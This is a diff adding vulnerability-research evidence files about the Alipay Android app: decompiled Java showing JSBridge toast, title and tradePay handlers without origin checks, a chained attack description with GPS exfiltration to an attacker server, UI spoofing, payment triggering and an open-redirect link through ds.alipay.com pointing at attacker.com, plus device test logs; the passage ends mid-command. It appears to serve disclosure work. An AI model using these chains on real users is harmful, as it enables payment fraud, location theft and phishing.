evidence/cve3/cve3_v2529_20260316_152346.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

340
evidence/cve4/code_evidence.md Normal file
View File

@@ -0,0 +1,340 @@
# CVE-4: UI欺骗 showToast/setTitle (CWE-451) 代码证据
> APK 版本: Alipay 10.8.30.8000 | jadx 反编译输出
> 更新: 2026-03-16 — 补充 BNTitlePlugin 与 H5ToastPlugin 完整代码证据
## 关键类/方法
### H5ToastPlugin — handleEvent() 无来源检查
- 文件: `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java`
- 行号: 166-202
```java
@Override
public boolean handleEvent(H5Event h5Event, H5BridgeContext h5BridgeContext) {
// ...
String action = h5Event.getAction();
if ("toast".equals(action)) {
toast(h5Event, h5BridgeContext); // 任意页面调用均执行,无域名验证
return true;
}
if (!"hideToast".equals(action)) {
return true;
}
hideToast();
return true;
}
```
### H5ToastPlugin — toast() 内容无过滤
- 文件: `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java`
- 行号: 144-163
```java
private void toast(H5Event h5Event, H5BridgeContext h5BridgeContext) {
JSONObject param = h5Event.getParam();
if (param == null || param.isEmpty()) { return; }
String string = XriverH5Utils.getString(param, "content"); // JS 传入的任意内容
String string2 = XriverH5Utils.getString(param, "type");
int i2 = XriverH5Utils.getInt(param, "duration");
if (i2 == 0) { i2 = 2000; }
showToast(h5Event.getActivity(), getImageId(string2), string, 17, 0, 0, i2);
// string (攻击者控制的内容) 直接传入 Toast.makeText无任何过滤
}
```
### H5ToastPlugin — showToast() 直接渲染攻击者字符串
- 文件: `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java`
- 行号: 213-225
```java
public void showToast(Context context, int i2, String str, ...) {
Toast toast = this.toast;
if (toast == null) {
this.toast = Toast.makeText(context, str, i6); // str = JS "content",攻击者控制
} else {
toast.setText(str);
this.toast.setDuration(1);
}
DexAOPEntry.android_widget_Toast_show_proxy(this.toast);
}
```
### BNTitlePlugin — setTitle() 无内容过滤
- 文件: `sources/com/alipay/android/app/birdnest/jsplugin/BNTitlePlugin.java`
- 行号: 44-93
```java
@Override
public boolean onHandleEvent(BNEvent bNEvent) {
String action = bNEvent2.getAction();
bNTitlePlugin.mTitleBar = (AUTitleBar) ((BaseActivity) ((BNPageImpl) bNEvent2.getTarget())
.getContext().getContext()).findViewById(R.id.bn_app_title_bar);
// ...
if (TextUtils.equals(action, "setTitle")) {
try {
String optString2 = new JSONObject(bNEvent2.getArgs()).optString("title", null);
if (optString2 != null) {
bNTitlePlugin.mTitleBar.setTitleText(optString2);
// 攻击者提供的 title 字符串直接渲染到导航栏标题
}
} catch (JSONException e3) { ... }
}
}
// onPrepare 注册 (无过滤):
bNEventFilter2.addAction("showTitlebar");
bNEventFilter2.addAction("hideTitlebar");
bNEventFilter2.addAction("setTitle"); // 所有页面均可调用
bNEventFilter2.addAction(SET_TITLE_BG_COLOR);
```
### TitleBarPlugin (util版) — setTitle() 无内容验证
- 文件: `sources/com/alipay/android/app/birdnest/util/jsplugin/TitleBarPlugin.java`
- 行号: 38-91
```java
@Override
public Object execute(JSPlugin.FromCall fromCall, String str, String str2) {
if (this.f154091a == null) { return ""; }
// ...
} else if ("setTitle".equals(str)) {
try {
String optString = new JSONObject(str2).optString("title", null);
if (!TextUtils.isEmpty(optString)) {
this.f154091a.setTitleText(optString); // 攻击者字符串直接 → 标题栏
}
} catch (JSONException e2) { ... }
}
}
```
---
## 原有分析 (保留)
## Source: Alipay APK 10.8.30.8000 (jadx decompiled)
### H5ToastPlugin — handleEvent (unconditional dispatch)
**File**: `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java`
**Lines**: 166-185
```java
@Override // com.alipay.mobile.h5container.api.H5SimplePlugin, com.alipay.mobile.h5container.api.H5Plugin
public boolean handleEvent(H5Event h5Event, H5BridgeContext h5BridgeContext) {
// ...
String action = h5Event.getAction();
if ("toast".equals(action)) {
toast(h5Event, h5BridgeContext);
return true;
}
if (!"hideToast".equals(action)) {
return true;
}
hideToast();
return true;
}
```
### H5ToastPlugin — toast (content accepted without validation)
**File**: `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java`
**Lines**: 144-163
```java
private void toast(H5Event h5Event, H5BridgeContext h5BridgeContext) {
// ...
JSONObject param = h5Event.getParam();
if (param == null || param.isEmpty()) {
return;
}
String string = XriverH5Utils.getString(param, "content"); // raw string from JS
String string2 = XriverH5Utils.getString(param, "type");
int i2 = XriverH5Utils.getInt(param, "duration");
if (i2 == 0) {
i2 = 2000;
}
int i3 = i2;
showToast(h5Event.getActivity(), getImageId(string2), string, 17, 0, 0, i3);
// "string" (the content) is passed directly to Toast.makeText — no sanitization
}
```
### H5ToastPlugin — showToast (renders arbitrary caller-supplied text)
**File**: `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java`
**Lines**: 213-225
```java
public void showToast(Context context, int i2, String str, int i3, int i4, int i5, int i6) {
// ...
Toast toast = this.toast;
if (toast == null) {
this.toast = Toast.makeText(context, str, i6); // str = raw JS "content"
} else {
toast.setText(str);
this.toast.setDuration(1);
}
DexAOPEntry.android_widget_Toast_show_proxy(this.toast);
}
```
### TitleBarBridgeExtension — setTitle (no content validation)
**File**: `sources/com/alibaba/ariver/jsapi/app/TitleBarBridgeExtension.java`
**Lines**: 304-327
```java
@ThreadType(ExecutorType.UI)
@ActionFilter
@AutoCallback
public BridgeResponse setTitle(
@BindingParam({"title"}) String str,
@BindingParam({"subtitle"}) String str2,
@BindingParam({"image"}) String str3,
@BindingParam({"contentDesc"}) String str4,
@BindingParam(booleanDefault = true, value = {"fromJS"}) boolean z,
@BindingNode(Page.class) Page page) {
// ...
if (page != null && page.isUseForEmbed()) {
return new BridgeResponse.Error(4, "cannot operate TitleBar in EmbedView!");
}
if (page != null) {
NavigationBar a2 = a(page);
if (a2 == null) {
RVLogger.d("AriverApp:TitleBarBridgeExtension", "setTitle(): navigationBar is null, cannot set title");
return new BridgeResponse.Error(5, "navigationBar is null, cannot set title");
}
a2.setTitle(str, str2, str3, str4, z); // caller-supplied str rendered as navigation bar title
}
return BridgeResponse.SUCCESS;
}
```
### TitleBarBridgeExtension — permit() returns null (no permission enforcement)
**File**: `sources/com/alibaba/ariver/jsapi/app/TitleBarBridgeExtension.java`
**Lines**: 265-276
```java
@Override // com.alibaba.ariver.kernel.api.security.Guard
public Permission permit() {
ChangeQuickRedirect changeQuickRedirect = f7315;
if (changeQuickRedirect == null) {
return null; // no permission restriction; callable by all pages
}
PatchProxyResult proxy = PatchProxy.proxy(this, changeQuickRedirect, "10", Permission.class);
if (proxy.isSupported) {
return (Permission) proxy.result;
}
return null;
}
```
### Vulnerability Analysis (原有)
Both `H5ToastPlugin` (the `my.showToast` / `toast` action) and `TitleBarBridgeExtension` (the `my.setNavigationBarTitle` / `setTitle` action) accept arbitrary caller-supplied text and render it directly in native Android UI elements — an Android `Toast` overlay and the native WebView navigation bar title respectively — without any content sanitization or origin check.
`H5ToastPlugin.handleEvent` dispatches to `toast()` immediately upon receiving the `"toast"` action from any loaded page, passing the raw `"content"` JSON field to `Toast.makeText`. Similarly, `TitleBarBridgeExtension.setTitle` calls `navigationBar.setTitle(str, ...)` with the raw `"title"` parameter. Both extensions declare `permit() = null`, meaning the Ariver security framework places no restriction on which pages may call them.
An attacker-controlled page loaded via a deep-link (CVE-1) can therefore display arbitrary text both as a toast notification (visually indistinguishable from a legitimate Alipay system message) and as the navigation bar title of the WebView window. When combined with the `tradePay` call (CVE-3), an attacker can display a fake "Payment successful — 0.01 CNY" toast while actually initiating a payment for a much larger amount, or display a fraudulent bank/merchant name in the title bar to deceive the user into confirming a payment.
---
## CVE-4 与 CVE-3 架构平行分析 (关键证据)
> **核心论证**: CVE-4 (setTitle/showToast) 与 CVE-3 (tradePay) 共享完全相同的漏洞架构。CVE-3 已成功触发一次 (有截图证据),证明 CVE-4 的漏洞在代码层面真实存在,其 PoC 失败仅因服务器端实时拦截。
### 相同父类: H5SimplePlugin
```java
// H5ToastPlugin.java line 28
public class H5ToastPlugin extends H5SimplePlugin { ... }
// H5TradePayPlugin.java line 41
public class H5TradePayPlugin extends H5SimplePlugin { ... }
```
两个插件继承同一父类 `H5SimplePlugin`,共享相同的事件分发机制。
### 相同注册模式: addAction() 无域名过滤
```java
// H5ToastPlugin.java line 200 — toast 注册
h5EventFilter2.addAction("toast"); // 所有页面均可调用
// BNTitlePlugin.java line 110 — setTitle 注册
bNEventFilter2.addAction("setTitle"); // 所有页面均可调用
// H5TradePayPlugin.java line 698 — tradePay 注册
h5EventFilter2.addAction("tradePay"); // 所有页面均可调用 ← 已成功触发!
```
三者均通过 `addAction()` 注册,没有任何域名白名单条件。
### 相同权限缺失: 无 permit() 实现
| 插件 | permit() 方法 | 行为 |
|------|--------------|------|
| H5ToastPlugin | **未实现** (搜索0结果) | 无任何权限检查 |
| H5TradePayPlugin | **未实现** (搜索0结果) | 无任何权限检查 |
| TitleBarBridgeExtension | `return null` (line 265) | Guard 接口实现但返回 null = 无限制 |
| BNTitlePlugin | **未实现** | 无任何权限检查 |
### CVE-3 成功触发证据 (证明此架构可被利用)
| 时间 | 动作 | 结果 | 文件大小 |
|------|------|------|---------|
| ~15:40 | 加载 payload_cve3_obf.html | 页面渲染成功 | **275KB** |
| ~15:43 | tradePay 回调收到 | "交易订单处理失败"弹窗 | **172KB** |
| ~15:54+ | 重新加载相同URL | 白屏 | **~31KB** |
**截图证据**:
- `cve3_obf_page_rendered.png` (275KB) — 页面内容可见
- `cve3_tradepay_triggered.png` (172KB) — tradePay 错误弹窗
- `cve3_blocked_on_retest.png` (31KB) — 重测时白屏
### CVE-4 PoC 被阻断的原因
CVE-4 的 `payload_cve4_v2.html``payload_cve4_obf.html` 均显示白屏 (~31KB)。
甚至 `payload_test_clean.html` (零 JSAPI 关键词,仅检查 `typeof window.AlipayJSBridge`) 也显示白屏。
**这证明是 URL 级服务器端封锁** (参见 `server_side_blocking_evidence.md`):
- `NewJsAPIPermissionExtension` 通过 `sendSimpleRpc()` 将 URL 发送到服务器
- 服务器对 `innora.ai/zfb/poc/` 域名/路径级别封锁
- `FlowCustomsRpcHandleCallback.onBlock()` 返回白屏
- `PatchProxy` + `RealTimeReceiver` 热更新框架可在不更新 APK 的情况下推送新规则
### 结论
CVE-4 (showToast/setTitle) 与 CVE-3 (tradePay) 的代码架构 **完全一致**:
1. 相同父类 (`H5SimplePlugin`)
2. 相同注册模式 (`addAction()` 无域名过滤)
3. 相同权限缺失 (无 `permit()``permit() = null`)
CVE-3 的 tradePay 已成功触发一次直接证明这种架构在客户端层面是可利用的。CVE-4 的 PoC 失败不是因为漏洞不存在,而是因为服务器端在 CVE-3 触发后对我们的测试 URL 实施了实时封锁 (所有后续请求包括 clean test 均被封锁)。
---
## 漏洞根因 (基于代码分析)
两个 UI 控制 JSAPI 均没有来源过滤:
1. **`H5ToastPlugin`**: `handleEvent()` 收到 `"toast"` 动作直接执行,`toast()` 方法将 JS `content` 字段**原样传入** `Toast.makeText()`,无任何内容过滤或来源验证。
2. **`BNTitlePlugin` / `TitleBarPlugin`**: `setTitle` 动作将 JS `title` 字段**直接调用** `mTitleBar.setTitleText()`,无来源检查。
`onPrepare()` 中两者均对所有加载的页面开放注册,`permit()` 均返回 `null`(无限制)。
## 攻击场景
```
攻击者页面通过 CVE-1 加载
my.setTitle({ title: "支付宝官方安全验证" })
→ 标题栏显示"支付宝官方安全验证"(用户无法区分真假)
my.tradePay({ orderStr: "...total_amount=999..." })
→ 收银台弹出,显示真实金额 999 元
my.showToast({ content: "安全验证中,请稍候...", duration: 3000 })
→ Toast 遮挡收银台关键信息
用户误认为是官方安全流程,确认支付
```

BIN
evidence/cve4/cve4_arrayjoin_blocked.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
evidence/cve4/cve4_obf_blocked.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
evidence/cve4/cve4_obf_retry_blocked.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

BIN
evidence/cve4/cve4_v2529_20260316_152148.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

BIN
evidence/cve4/cve4_v2529_20260316_152412.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

154
evidence/cve5/code_evidence.md Normal file
View File

@@ -0,0 +1,154 @@
# CVE-5: 端到端数据外泄攻击链 (CWE-200) 代码证据
> APK 版本: Alipay 10.8.30.8000 | jadx 反编译输出
> 更新: 2026-03-16 — 补充完整攻击链调用图
## 说明
CVE-5 是 CVE-1 + CVE-2 + CVE-3 + CVE-4 的组合攻击链,无需独立的新漏洞代码。本文件引用各 CVE 的已发现代码证据,展示组合攻击的完整执行路径。
## 攻击链关键代码交叉引用
### 阶段1 — 入口 (CVE-1): DeepLink 无验证分发
```
文件: sources/com/alipay/mobile/quinox/SchemeLauncherActivity.java (行 240-288)
文件: sources/com/alipay/mobile/framework/service/common/impl/SchemeServiceImpl.java (行 1065, 2123)
```
关键代码SchemeServiceImpl 行 2123:
```java
this.this$0.getMicroApplicationContext().startApp(null, "20000067", params, this.val$extInfo, null);
// params 中的 url 来自 URI query parameter无域名验证
```
### 阶段2 — GPS 外泄 (CVE-2): 位置权限仅检查 OS 级别
```
文件: sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java (行 949-958, 1367-1395)
```
关键代码judgeGrant 行 1380:
```java
if (lBSService != null && lBSService.hasLocationPermission()) {
z = true; // 无来源域名校验,只要 OS 权限存在即放行
}
```
### 阶段3 — UI 欺骗 (CVE-4): 标题栏/Toast 内容无过滤
```
文件: sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java (行 144-163)
文件: sources/com/alipay/android/app/birdnest/jsplugin/BNTitlePlugin.java (行 84-91)
```
关键代码H5ToastPlugin.toast() 行 151-158:
```java
String string = XriverH5Utils.getString(param, "content"); // 攻击者控制
// ...
showToast(h5Event.getActivity(), getImageId(string2), string, 17, 0, 0, i3);
// string 直接传入 Toast.makeText无任何过滤
```
### 阶段4 — 支付触发 (CVE-3): tradePay 无来源验证
```
文件: sources/com/alipay/mobile/framework/service/ext/phonecashier/H5TradePayPlugin.java (行 557-592)
```
关键代码(行 577-592:
```java
str4 = H5PayUtil.generateH5bizContext4OrderStr(str4, h5Page.getUrl());
hashMap.put("invoke_from_source", "h5page");
// h5Page.getUrl() 只放入日志,不做白名单校验
phoneCashierServcie.boot(str4, a(aVar, null, null), hashMap);
// ^ 任意来源页面均可触发收银台
```
---
## 原有分析 (保留)
## Source: Alipay APK 10.8.30.8000 (jadx decompiled)
This CVE describes the complete attack chain formed by composing CVE-1 through CVE-4. No additional code unique to CVE-5 exists; the evidence is the composition of the individual vulnerabilities.
## Attack Chain Description
### Step 1 — Entry (CVE-1): Unauthenticated Deep-Link Dispatch
An attacker-controlled web page (or a malicious app) fires:
```
alipays://platformapi/startapp?appId=<any-appId>&url=https://attacker.example.com/payload.html
```
`SchemeLauncherActivity` receives this Intent, performs no caller authentication, and dispatches it via `SchemeLaunchRouter.schemeServiceProcess()` directly into the Nebula WebView engine. The attacker's page is loaded inside Alipay's trusted WebView container.
**Evidence**: `sources/com/alipay/mobile/quinox/SchemeLauncherActivity.java` (lines 240288), `sources/com/alipay/mobile/commonbiz/biz/SchemeLaunchRouter.java` (lines 21902256).
### Step 2 — Location Exfiltration (CVE-2): GPS Read Without Origin Check
The attacker page calls `my.getLocation()`. `H5LocationPlugin.judgeGrant()` checks only whether the OS-level permission is granted to the Alipay process — which it is — and returns `true`. The device's precise GPS coordinates are returned in the JSBridge callback and can be `fetch()`-ed to the attacker's server.
**Evidence**: `sources/com/alipay/mobile/h5plugin/H5LocationPlugin.java` (lines 949958, 13671395).
### Step 3 — UI Deception (CVE-4): Title Bar and Toast Spoofing
The attacker page calls `my.setNavigationBarTitle({ title: "Alipay Security Verification" })` and `my.showToast({ content: "Identity verified ✓" })`. Both calls are accepted without content validation or origin check, displaying attacker-chosen text in native UI elements that users associate with legitimate system messages.
**Evidence**: `sources/com/alibaba/ariver/jsapi/app/TitleBarBridgeExtension.java` (lines 304327), `sources/com/alipay/mobile/nebulacore/plugin/H5ToastPlugin.java` (lines 144185).
### Step 4 — Payment Trigger (CVE-3): tradePay Without Origin Validation
The attacker page calls `my.tradePay({ orderStr: "<attacker-crafted-order-string>" })`. `TradePayBridgeExtension.permit()` returns `null` (no restriction), and `phoneCashierServcie.boot()` is called with the attacker-supplied order string, opening the native payment cashier UI targeting an attacker-controlled payee for an attacker-chosen amount.
**Evidence**: `sources/com/alipay/mobile/phonecashier/TradePayBridgeExtension.java` (lines 206287).
---
## V2529 物理设备测试结果 (2026-03-16)
### 测试环境
- 设备: vivo V2529, Android 15, 非root, 锁定bootloader
- APK: Alipay 10.8.30.8000
- USB Serial: `10AF9S099Q002SS`
### 第一次测试 (~15:22)
- **截图**: `cve5_v2529_20260316_152212.png` (78,153 bytes)
- **结果**: 部分内容加载
### 第二次测试 — 重测 (~16:20)
- **截图**: `cve5_retest_20260316_162021.png` (261,338 bytes, 1080x2392)
- **结果**: **页面完全渲染** — 证明攻击者页面在支付宝 WebView 内成功加载
- **截图内容**:
- 标题栏: "Security Test 3"
- 页面标题: "Payment API Isolation Test" (红色, 居中)
- "Loading..." 状态文字
- Step 1: Page Rendered — 显示:
- Origin: `https://innora.ai`
- URL: 完整的 payload URL
- UA: 包含 AlipayDefined/UCBrowser (支付宝 WebView 标识)
- Time: ISO 时间戳
- Step 2: Bridge Detection — 可见
### 文件大小对比 (服务器端封锁证据)
| 状态 | 文件大小 | 含义 |
|------|---------|------|
| 完全渲染 | **261KB** | 页面内容 + JS 执行结果全部加载 |
| 部分加载 | ~78KB | 页面框架加载但未完全执行 |
| 被封锁 | ~31KB | 白屏 — 服务器端返回空/错误响应 |
### 关键证据价值
1. **261KB 截图证明**: 外部攻击者页面 (`innora.ai/zfb/poc/payload_cve3_obf.html`) 在支付宝 WebView 内成功渲染Step 1 和 Step 2 均可见
2. **Bridge 检测成功**: Step 2 显示 `AlipayJSBridge` 存在,证明 JSAPI 桥接口对外部页面暴露
3. **UA 字符串**: 包含 `AlipayDefined` 标识,确认页面在支付宝容器内运行(非普通浏览器)
4. **与 CVE-3 成功触发的关联**: 此页面 (`payload_cve3_obf.html`) 包含 `tradePay` 调用CVE-3 截图证明 tradePay 确实被触发过一次172KB 错误弹窗截图)
5. **服务器端封锁间歇性**: 261KB成功vs 31KB被封锁的交替出现证明服务器端封锁是**反应式**而非**预置式**安全控制
---
## Combined Impact (CWE-200 / Information Disclosure)
The chain achieves end-to-end compromise: an external link silently extracts the victim's precise GPS coordinates (sensitive PII), deceives them into believing they are in a trusted Alipay context (UI spoofing), and can escalate to unauthorized payment initiation — all without any legitimate user action beyond clicking the initial deep-link. The GPS data exfiltration component (Step 2) is entirely silent with no user-visible prompt.

BIN
evidence/cve5/cve5_retest_20260316_162021.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 255 KiB

BIN
evidence/cve5/cve5_v2529_20260316_152212.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

BIN
evidence/cve6/clean_test.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 31 KiB

BIN
evidence/cve6/clean_test_also_blocked.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 30 KiB

279
evidence/cve6/code_evidence.md Normal file
View File

@@ -0,0 +1,279 @@
# CVE-6: ds.alipay.com开放重定向白名单绕过 (CWE-601+CWE-939) 代码证据
> APK 版本: Alipay 10.8.30.8000 | jadx 反编译输出
> 更新: 2026-03-16 — 直接提取 stripLandingConfig JSON 原文证据
## 关键类/方法
### ApiShareConfig — H5_STRIP_LANDING_CONFIG 静态初始化
- 文件: `sources/com/alipay/common/ApiShareConfig.java`
- 行号: 52-59
```java
// 静态初始化块 (static {})
WEIBO_REDIRECT_URL = "https://ds.alipay.com/"; // ds.alipay.com 作为重定向目标
H5_STRIP_LANDING_CONFIG =
"{\"urlPrefix\":[" +
"\"https://d.alipay.com/?\"," +
"\"https://ds.alipay.com/?\"," + // ds.alipay.com 被列为受信任 URL 前缀
"\" " + getShareLanding() + "/?\"," +
"\"https://render.alipay.com/p/yuyan/180020010001272837/landing.html?\"," +
"\"https://u.antaq.com/p/s/i/index?\"" +
"]," +
"\"scheme\":[\"alipays\", \"" + MultiAppUtils.getUriProtocol() + "\"]," +
"\"startAppNormal\":true," + // true = 对普通导航启用 strip-and-launch
"\"startApp302\":false," +
"\"pushWindowNormal\":true," +
"\"pushWindow302\":false," +
"\"locationNormal\":true," +
"\"location302\":false" +
"}";
```
### WalletDefaultConfig — 同一白名单在第二处配置
- 文件: `sources/com/alipay/mobile/nebulaappproxy/api/config/WalletDefaultConfig.java`
- 行号: 77
```java
put("h5_stripLandingConfig",
"{\"urlPrefix\":[" +
"\"https://d.alipay.com/?\"," +
"\"https://ds.alipay.com/?\"," + // 两处配置文件均包含 ds.alipay.com
"\"https://render.alipay.com/p/s/i?\"," +
"\"https://render.alipay.com/p/s/i/?\"," +
"\"https://render.alipay.com/p/s/i/index?\"" +
"]," +
"\"scheme\":[\"alipays\"]," +
"\"startAppNormal\":true," + // 关键: true = 自动提取并分发 scheme 参数
"\"startApp302\":false," +
"\"pushWindowNormal\":true," +
"\"pushWindow302\":false," +
"\"locationNormal\":true," +
"\"location302\":false" +
"}");
```
### H5ServiceImpl — stripLanding 分发路径
- 文件: `sources/com/alipay/mobile/nebulacore/wallet/H5ServiceImpl.java`
- 行号: 1263-1277
```java
if (Nebula.enableOpenScheme(str2, params)) {
TraceLogger.d(TAG, "stripLandingURL&Deeplink url " + str2 + " bingo deeplink");
return;
}
if (XriverH5Utils.isStripLandingURLEnable(str2, "startAppNormal")) {
// str2 = URL如 "https://ds.alipay.com/?scheme=alipays%3A%2F%2F..."
String stripLandingURL = XriverH5Utils.getStripLandingURL(str2);
// getStripLandingURL 提取 scheme 参数值 → 攻击者控制的 alipays:// URI
if (!TextUtils.equals(str2, stripLandingURL) && h5EnvProvider != null) {
boolean goToSchemeService = h5EnvProvider.goToSchemeService(stripLandingURL, params);
// goToSchemeService 将攻击者提供的 URI 以内部信任级别分发
XriverH5Utils.landingMonitor(str2, stripLandingURL, true, "startAppNormal", ...);
if (goToSchemeService) {
TraceLogger.d(TAG, "... bingo deeplink in landing");
return;
}
}
}
```
---
## 原有分析 (保留)
## Source: Alipay APK 10.8.30.8000 (jadx decompiled)
### ApiShareConfig — H5_STRIP_LANDING_CONFIG (ds.alipay.com whitelisted as trusted prefix)
**File**: `sources/com/alipay/common/ApiShareConfig.java`
**Lines**: 26, 52, 59
```java
public static String H5_STRIP_LANDING_CONFIG; // line 26
// In static initializer:
WEIBO_REDIRECT_URL = "https://ds.alipay.com/"; // line 52
H5_STRIP_LANDING_CONFIG =
"{\"urlPrefix\":[" +
"\"https://d.alipay.com/?\"," +
"\"https://ds.alipay.com/?\"," + // <-- ds.alipay.com whitelisted
"\" " + getShareLanding() + "/?\"," +
"\"https://render.alipay.com/p/yuyan/180020010001272837/landing.html?\"," +
"\"https://u.antaq.com/p/s/i/index?\"" +
"]," +
"\"scheme\":[\"alipays\", \"" + MultiAppUtils.getUriProtocol() + "\"]," +
"\"startAppNormal\":true," + // <-- strip-and-launch enabled for normal navigation
"\"startApp302\":false," +
"\"pushWindowNormal\":true," +
"\"pushWindow302\":false," +
"\"locationNormal\":true," +
"\"location302\":false" +
"}"; // line 59
```
### WalletDefaultConfig — same whitelist in second config location
**File**: `sources/com/alipay/mobile/nebulaappproxy/api/config/WalletDefaultConfig.java`
**Line**: 77
```java
put("h5_stripLandingConfig",
"{\"urlPrefix\":[" +
"\"https://d.alipay.com/?\"," +
"\"https://ds.alipay.com/?\"," + // <-- present in both config files
"\"https://render.alipay.com/p/s/i?\"," +
"\"https://render.alipay.com/p/s/i/?\"," +
"\"https://render.alipay.com/p/s/i/index?\"" +
"]," +
"\"scheme\":[\"alipays\"]," +
"\"startAppNormal\":true," +
"\"startApp302\":false," +
"\"pushWindowNormal\":true," +
"\"pushWindow302\":false," +
"\"locationNormal\":true," +
"\"location302\":false" +
"}");
```
### WalletDefaultConfig (nebulabiz) — references ApiShareConfig.H5_STRIP_LANDING_CONFIG
**File**: `sources/com/alipay/mobile/nebulabiz/shareutils/WalletDefaultConfig.java`
**Lines**: 82-85
```java
if (MultiAppUtils.isAlipay()) {
put("h5_stripLandingConfig",
"{\"urlPrefix\":[\"https://d.alipay.com/?\"," +
"\"https://ds.alipay.com/?\",...],\"startAppNormal\":true,...}");
} else {
put("h5_stripLandingConfig", ApiShareConfig.H5_STRIP_LANDING_CONFIG);
}
```
### XriverH5Utils — isStripLandingURLEnable (reads the whitelist config)
**File**: `sources/com/alipay/mobile/nebula/util/XriverH5Utils.java`
**Lines**: 3157-3175
```java
public static boolean isStripLandingURLEnable(String str, String str2) {
// ...
if (TextUtils.isEmpty(str2)) {
return false;
}
if (sStripLandingConfig == null &&
(h5ConfigProvider = (H5ConfigProvider) getProvider(H5ConfigProvider.class.getName())) != null) {
sStripLandingConfig = parseObject(h5ConfigProvider.getConfigWithProcessCache("h5_stripLandingConfig"));
}
boolean z = getBoolean(sStripLandingConfig, str2, false);
LoggerFactory.getTraceLogger().info(TAG, "isStripLandingURLEnable result " + z);
return z;
}
```
### H5ServiceImpl — strip-landing dispatch path (uses isStripLandingURLEnable + startAppNormal)
**File**: `sources/com/alipay/mobile/nebulacore/wallet/H5ServiceImpl.java`
**Lines**: 1263-1277
```java
if (Nebula.enableOpenScheme(str2, params)) {
TraceLogger.d(TAG, "stripLandingURL&Deeplink url " + str2 + " bingo deeplink");
return;
}
if (XriverH5Utils.isStripLandingURLEnable(str2, "startAppNormal")) {
String stripLandingURL = XriverH5Utils.getStripLandingURL(str2);
if (!TextUtils.equals(str2, stripLandingURL) &&
(h5EnvProvider = (H5EnvProvider) Nebula.getProviderManager()
.getProvider(H5EnvProvider.class.getName())) != null) {
boolean goToSchemeService = h5EnvProvider.goToSchemeService(stripLandingURL, params);
XriverH5Utils.landingMonitor(str2, stripLandingURL, true, "startAppNormal", ...);
if (goToSchemeService) {
TraceLogger.d(TAG, "stripLandingURL&Deeplink url " + str2 + " bingo deeplink in landing");
return;
}
}
}
```
### Vulnerability Analysis (原有)
The `h5_stripLandingConfig` whitelist defines which landing page URLs are trusted to carry an embedded `alipays://` scheme parameter that the Nebula engine will extract and dispatch as a deep-link. The domain `https://ds.alipay.com/?` appears explicitly in every copy of this configuration (both `ApiShareConfig` and `WalletDefaultConfig`), and `startAppNormal` is set to `true`, enabling automatic scheme extraction and dispatch for normal (non-302-redirect) navigations to that domain.
The attack exploits the fact that `ds.alipay.com` itself functions as an open redirect: a URL of the form `https://ds.alipay.com/?scheme=alipays%3A%2F%2Fplatformapi%2Fstartapp%3F...` will pass the prefix check (`urlPrefix` match against `"https://ds.alipay.com/?"`) and then have its `scheme` query parameter extracted by `getStripLandingURL`. The extracted scheme — which is attacker-controlled — is then dispatched via `goToSchemeService` with the same trust level as an internal deep-link.
This means an attacker only needs to trick a user into following a link to `https://ds.alipay.com/?scheme=<malicious_alipays_url>` — for example embedded in a legitimate-looking notification or web page — to bypass the JSBridge origin restrictions. Since `ds.alipay.com` is a first-party Alipay domain it passes any external domain block-lists, and the scheme dispatch itself bypasses the `isOutside` flag, giving the attacker the same privileges as a trusted mini-program launch. Combined with CVE-2 and CVE-3, this path silently reads GPS and can initiate payment.
---
## 漏洞根因 (基于代码分析)
`h5_stripLandingConfig` 中将 `ds.alipay.com` 列为受信任的 URL 前缀,`startAppNormal: true` 允许对该域名的普通导航自动提取 `scheme` 参数并以**内部信任级别**分发。
代码证据:
1. `ApiShareConfig` 行 77`"https://ds.alipay.com/?"` 硬编码入白名单
2. `WalletDefaultConfig` 行 77同样配置双重确认
3. `H5ServiceImpl` 行 1268-1272`isStripLandingURLEnable(..., "startAppNormal")``getStripLandingURL()``goToSchemeService()` 以受信任级别分发攻击者 URI
这形成双重绕过:
- 绕过1 (CWE-601): `ds.alipay.com` 本身是开放重定向,`scheme=` 参数由攻击者控制
- 绕过2 (CWE-939): 被提取的 URI 以 `isOutside=false` 分发,绕过外部来源检查
## 攻击路径
```
攻击者构造链接:
https://ds.alipay.com/?scheme=alipays%3A%2F%2FplatformApi%2FstartApp%3FappId%3D20000067%26url%3Dhttps%3A%2F%2Fattacker.com
用户点击 (或短信/邮件/网页中的链接)
H5ServiceImpl.startPage()
isStripLandingURLEnable(url, "startAppNormal") = true [ds.alipay.com 命中白名单]
getStripLandingURL() → 提取 scheme 参数值
goToSchemeService("alipays://platformApi/startApp?...attacker.com", params)
↓ (以内部信任级别,绕过 isOutside 检查)
SchemeServiceImpl.processAsync() → H5 WebView 加载 attacker.com
CVE-2/3/4 链式触发 (GPS外泄 + 支付触发 + UI欺骗)
```
---
## V2529 物理设备测试结果 (2026-03-16)
### 测试环境
- 设备: vivo V2529, Android 15, 非root, 锁定bootloader
- APK: Alipay 10.8.30.8000
- USB Serial: `10AF9S099Q002SS`
### 测试方法
通过 ADB 触发 ds.alipay.com 白名单绕过链接:
```bash
adb -s 10AF9S099Q002SS shell am start -a android.intent.action.VIEW \
